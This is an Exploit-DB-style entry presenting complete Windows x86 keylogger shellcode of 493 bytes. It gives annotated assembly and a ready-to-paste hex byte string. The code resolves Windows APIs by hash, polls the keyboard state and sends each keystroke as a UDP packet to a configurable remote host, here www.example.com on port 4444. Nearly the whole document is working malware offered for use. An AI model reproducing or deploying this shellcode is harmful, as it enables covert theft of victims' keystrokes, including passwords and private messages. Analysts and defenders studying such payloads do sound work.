Windows x86 - Keylogger Reverse UDP Shellcode (493 bytes)

🗓️ 17 Oct 2016 00:00:00Reported by FuguType 
exploitdb

Windows x86 Keylogger Reverse UDP Shellcode

; Exploit Title: x86 windows shellcode - keylogger reverse udp - 493 bytes
; Date: Fri Oct 13 12:58:35 GMT 2016
; Exploit Author: Fugu
; Vendor Homepage: www.microsoft.com
; Version: all win
; Tested on: Windows 7(x86), 8.1(x86), 10(x86_64)
; Note: it sends each keystroke to the host as a UDP packet with a single-byte payload.
;       Keystrokes are encoded as Windows "Virtual-Key Codes", as documented on
;       the msdn.microsoft.com website.

section .bss

section .data

section .text
   global _start
      _start:
    cld										; 00000000 FC
    call dword loc_88h						; 00000001 E882000000
    pushad									; 00000006 60
    mov ebp,esp								; 00000007 89E5
    xor eax,eax								; 00000009 31C0
    mov edx,[fs:eax+0x30]					; 0000000B 648B5030
    mov edx,[edx+0xc]						; 0000000F 8B520C
    mov edx,[edx+0x14]						; 00000012 8B5214
loc_15h:
    mov esi,[edx+0x28]						; 00000015 8B7228
    movzx ecx,word [edx+0x26]				; 00000018 0FB74A26
    xor edi,edi								; 0000001C 31FF
loc_1eh:
    lodsb									; 0000001E AC
    cmp al,0x61								; 0000001F 3C61
    jl loc_25h								; 00000021 7C02
    sub al,0x20								; 00000023 2C20
loc_25h:
    ror edi,byte 0xd						; 00000025 C1CF0D
    add edi,eax								; 00000028 01C7
    loop loc_1eh							; 0000002A E2F2
    push edx								; 0000002C 52
    push edi								; 0000002D 57
    mov edx,[edx+0x10]						; 0000002E 8B5210
    mov ecx,[edx+0x3c]						; 00000031 8B4A3C
    mov ecx,[ecx+edx+0x78]					; 00000034 8B4C1178
    jecxz loc_82h							; 00000038 E348
    add ecx,edx								; 0000003A 01D1
    push ecx								; 0000003C 51
    mov ebx,[ecx+0x20]						; 0000003D 8B5920
    add ebx,edx								; 00000040 01D3
    mov ecx,[ecx+0x18]						; 00000042 8B4918
loc_45h:
    jecxz loc_81h							; 00000045 E33A
    dec ecx									; 00000047 49
    mov esi,[ebx+ecx*4]						; 00000048 8B348B
    add esi,edx								; 0000004B 01D6
    xor edi,edi								; 0000004D 31FF
loc_4fh:
    lodsb									; 0000004F AC
    ror edi,byte 0xd						; 00000050 C1CF0D
    add edi,eax								; 00000053 01C7
    cmp al,ah								; 00000055 38E0
    jnz loc_4fh								; 00000057 75F6
    add edi,[ebp-0x8]						; 00000059 037DF8
    cmp edi,[ebp+0x24]						; 0000005C 3B7D24
    jnz loc_45h								; 0000005F 75E4
    pop eax									; 00000061 58
    mov ebx,[eax+0x24]						; 00000062 8B5824
    add ebx,edx								; 00000065 01D3
    mov cx,[ebx+ecx*2]						; 00000067 668B0C4B
    mov ebx,[eax+0x1c]						; 0000006B 8B581C
    add ebx,edx								; 0000006E 01D3
    mov eax,[ebx+ecx*4]						; 00000070 8B048B
    add eax,edx								; 00000073 01D0
    mov [esp+0x24],eax						; 00000075 89442424
    pop ebx									; 00000079 5B
    pop ebx									; 0000007A 5B
    popad									; 0000007B 61
    pop ecx									; 0000007C 59
    pop edx									; 0000007D 5A
    push ecx								; 0000007E 51
    jmp eax									; 0000007F FFE0
loc_81h:
    pop edi									; 00000081 5F
loc_82h:
    pop edi									; 00000082 5F
    pop edx									; 00000083 5A
    mov edx,[edx]							; 00000084 8B12
    jmp short loc_15h						; 00000086 EB8D
loc_88h:
    pop ebp									; 00000088 5D
    push dword 0x3233						; 00000089 6833320000
    push dword 0x5f327377					; 0000008E 687773325F
    push esp								; 00000093 54
    push dword 0x726774c					; 00000094 684C772607
    call ebp								; 00000099 FFD5
    mov eax,0x190							; 0000009B B890010000
    sub esp,eax								; 000000A0 29C4
    push esp								; 000000A2 54
    push eax								; 000000A3 50
    push dword 0x6b8029						; 000000A4 6829806B00
    call ebp								; 000000A9 FFD5
    push byte +0x10							; 000000AB 6A10
    jmp dword loc_1ceh						; 000000AD E91C010000
loc_b2h:
    push dword 0x803428a9					; 000000B2 68A9283480
    call ebp								; 000000B7 FFD5
    lea esi,[eax+0x1c]						; 000000B9 8D701C
    xchg esi,esp							; 000000BC 87F4
    pop eax									; 000000BE 58
    xchg esp,esi							; 000000BF 87E6
    mov esi,eax								; 000000C1 89C6
    push dword 0x6c6c						; 000000C3 686C6C0000
    push dword 0x642e7472					; 000000C8 6872742E64
    push dword 0x6376736d					; 000000CD 686D737663
    push esp								; 000000D2 54
    push dword 0x726774c					; 000000D3 684C772607
    call ebp								; 000000D8 FFD5
    jmp dword loc_1e3h						; 000000DA E904010000
loc_dfh:
    push dword 0xd1ecd1f					; 000000DF 681FCD1E0D
    call ebp								; 000000E4 FFD5
    xchg ah,al								; 000000E6 86E0
    ror eax,byte 0x10						; 000000E8 C1C810
    inc eax									; 000000EB 40
    inc eax									; 000000EC 40
    push esi								; 000000ED 56
    push eax								; 000000EE 50
    mov esi,esp								; 000000EF 89E6
    xor eax,eax								; 000000F1 31C0
    push eax								; 000000F3 50
    push eax								; 000000F4 50
    push eax								; 000000F5 50
    push eax								; 000000F6 50
    inc eax									; 000000F7 40
    inc eax									; 000000F8 40
    push eax								; 000000F9 50
    push eax								; 000000FA 50
    push dword 0xe0df0fea					; 000000FB 68EA0FDFE0
    call ebp								; 00000100 FFD5
    mov edi,eax								; 00000102 89C7
loc_104h:
    push byte +0x10							; 00000104 6A10
    push esi								; 00000106 56
    push edi								; 00000107 57
    push dword 0x6174a599					; 00000108 6899A57461
    call ebp								; 0000010D FFD5
    test eax,eax							; 0000010F 85C0
    jz loc_122h								; 00000111 740F
    dec dword [esi+0x8]						; 00000113 FF4E08
    jnz loc_104h							; 00000116 75EC
    xor eax,eax								; 00000118 31C0
    push eax								; 0000011A 50
    push dword 0x56a2b5f0					; 0000011B 68F0B5A256
    call ebp								; 00000120 FFD5
loc_122h:
    push dword 0x3233						; 00000122 6833320000
    push dword 0x72657375					; 00000127 6875736572
    push esp								; 0000012C 54
    push dword 0x726774c					; 0000012D 684C772607
    call ebp								; 00000132 FFD5
    push dword 0x657461						; 00000134 6861746500
    push dword 0x74537965					; 00000139 6865795374
    push dword 0x4b746547					; 0000013E 684765744B
    push esp								; 00000143 54
    push eax								; 00000144 50
    push dword 0x7802f749					; 00000145 6849F70278
    call ebp								; 0000014A FFD5
    push esi								; 0000014C 56
    push edi								; 0000014D 57
    push eax								; 0000014E 50
    xor ecx,ecx								; 0000014F 31C9
    mov esi,ecx								; 00000151 89CE
    mov cl,0x8								; 00000153 B108
loc_155h:
    push esi								; 00000155 56
    loop loc_155h							; 00000156 E2FD
loc_158h:
    xor ecx,ecx								; 00000158 31C9
    xor esi,esi								; 0000015A 31F6
    push byte +0x8							; 0000015C 6A08
    push dword 0xe035f044					; 0000015E 6844F035E0
    call ebp								; 00000163 FFD5
loc_165h:
    mov eax,esi								; 00000165 89F0
    cmp al,0xff								; 00000167 3CFF
    jnc loc_158h							; 00000169 73ED
    inc esi									; 0000016B 46
    push esi								; 0000016C 56
    call dword [esp+0x24]					; 0000016D FF542424
    mov edx,esi								; 00000171 89F2
    xor ecx,ecx								; 00000173 31C9
    mov cl,0x80								; 00000175 B180
    and eax,ecx								; 00000177 21C8
    xor ecx,ecx								; 00000179 31C9
    cmp eax,ecx								; 0000017B 39C8
    jnz loc_18fh							; 0000017D 7510
    xor edx,edx								; 0000017F 31D2
    mov ecx,edx								; 00000181 89D1
    mov eax,esi								; 00000183 89F0
    mov cl,0x20								; 00000185 B120
    div ecx									; 00000187 F7F1
    btr [esp+eax*4],edx						; 00000189 0FB31484
    jmp short loc_165h						; 0000018D EBD6
loc_18fh:
    xor edx,edx								; 0000018F 31D2
    mov ecx,edx								; 00000191 89D1
    mov eax,esi								; 00000193 89F0
    mov cl,0x20								; 00000195 B120
    div ecx									; 00000197 F7F1
    bt [esp+eax*4],edx						; 00000199 0FA31484
    jc loc_165h								; 0000019D 72C6
    xor edx,edx								; 0000019F 31D2
    mov ecx,edx								; 000001A1 89D1
    mov eax,esi								; 000001A3 89F0
    mov cl,0x20								; 000001A5 B120
    div ecx									; 000001A7 F7F1
    bts [esp+eax*4],edx						; 000001A9 0FAB1484
    push esi								; 000001AD 56
    push byte +0x10							; 000001AE 6A10
    push dword [esp+0x30]					; 000001B0 FF742430
    push byte +0x0							; 000001B4 6A00
    push byte +0x1							; 000001B6 6A01
    lea ecx,[esp+0x10]						; 000001B8 8D4C2410
    push ecx								; 000001BC 51
    push dword [esp+0x3c]					; 000001BD FF74243C
    push dword 0xdf5c9d75					; 000001C1 68759D5CDF
    call ebp								; 000001C6 FFD5
    lea esp,[esp+0x4]						; 000001C8 8D642404
    jmp short loc_158h						; 000001CC EB8A
loc_1ceh:
    call dword loc_b2h						; 000001CE E8DFFEFFFF
    db "www.example.com",0
loc_1e3h:
    call dword loc_dfh
    db "4444",0

;"\xfc\xe8\x82\x00\x00\x00\x60\x89\xe5\x31\xc0\x64\x8b\x50\x30\x8b"
;"\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26\x31\xff\xac\x3c"
;"\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\xe2\xf2\x52\x57\x8b\x52"
;"\x10\x8b\x4a\x3c\x8b\x4c\x11\x78\xe3\x48\x01\xd1\x51\x8b\x59\x20"
;"\x01\xd3\x8b\x49\x18\xe3\x3a\x49\x8b\x34\x8b\x01\xd6\x31\xff\xac"
;"\xc1\xcf\x0d\x01\xc7\x38\xe0\x75\xf6\x03\x7d\xf8\x3b\x7d\x24\x75"
;"\xe4\x58\x8b\x58\x24\x01\xd3\x66\x8b\x0c\x4b\x8b\x58\x1c\x01\xd3"
;"\x8b\x04\x8b\x01\xd0\x89\x44\x24\x24\x5b\x5b\x61\x59\x5a\x51\xff"
;"\xe0\x5f\x5f\x5a\x8b\x12\xeb\x8d\x5d\x68\x33\x32\x00\x00\x68\x77"
;"\x73\x32\x5f\x54\x68\x4c\x77\x26\x07\xff\xd5\xb8\x90\x01\x00\x00"
;"\x29\xc4\x54\x50\x68\x29\x80\x6b\x00\xff\xd5\x6a\x10\xe9\x1c\x01"
;"\x00\x00\x68\xa9\x28\x34\x80\xff\xd5\x8d\x70\x1c\x87\xf4\x58\x87"
;"\xe6\x89\xc6\x68\x6c\x6c\x00\x00\x68\x72\x74\x2e\x64\x68\x6d\x73"
;"\x76\x63\x54\x68\x4c\x77\x26\x07\xff\xd5\xe9\x04\x01\x00\x00\x68"
;"\x1f\xcd\x1e\x0d\xff\xd5\x86\xe0\xc1\xc8\x10\x40\x40\x56\x50\x89"
;"\xe6\x31\xc0\x50\x50\x50\x50\x40\x40\x50\x50\x68\xea\x0f\xdf\xe0"
;"\xff\xd5\x89\xc7\x6a\x10\x56\x57\x68\x99\xa5\x74\x61\xff\xd5\x85"
;"\xc0\x74\x0f\xff\x4e\x08\x75\xec\x31\xc0\x50\x68\xf0\xb5\xa2\x56"
;"\xff\xd5\x68\x33\x32\x00\x00\x68\x75\x73\x65\x72\x54\x68\x4c\x77"
;"\x26\x07\xff\xd5\x68\x61\x74\x65\x00\x68\x65\x79\x53\x74\x68\x47"
;"\x65\x74\x4b\x54\x50\x68\x49\xf7\x02\x78\xff\xd5\x56\x57\x50\x31"
;"\xc9\x89\xce\xb1\x08\x56\xe2\xfd\x31\xc9\x31\xf6\x6a\x08\x68\x44"
;"\xf0\x35\xe0\xff\xd5\x89\xf0\x3c\xff\x73\xed\x46\x56\xff\x54\x24"
;"\x24\x89\xf2\x31\xc9\xb1\x80\x21\xc8\x31\xc9\x39\xc8\x75\x10\x31"
;"\xd2\x89\xd1\x89\xf0\xb1\x20\xf7\xf1\x0f\xb3\x14\x84\xeb\xd6\x31"
;"\xd2\x89\xd1\x89\xf0\xb1\x20\xf7\xf1\x0f\xa3\x14\x84\x72\xc6\x31"
;"\xd2\x89\xd1\x89\xf0\xb1\x20\xf7\xf1\x0f\xab\x14\x84\x56\x6a\x10"
;"\xff\x74\x24\x30\x6a\x00\x6a\x01\x8d\x4c\x24\x10\x51\xff\x74\x24"
;"\x3c\x68\x75\x9d\x5c\xdf\xff\xd5\x8d\x64\x24\x04\xeb\x8a\xe8\xdf"
;"\xfe\xff\xff\x77\x77\x77\x2e\x65\x78\x61\x6d\x70\x6c\x65\x2e\x63"
;"\x6f\x6d\x00\xe8\xf7\xfe\xff\xff\x34\x34\x34\x34\x00"
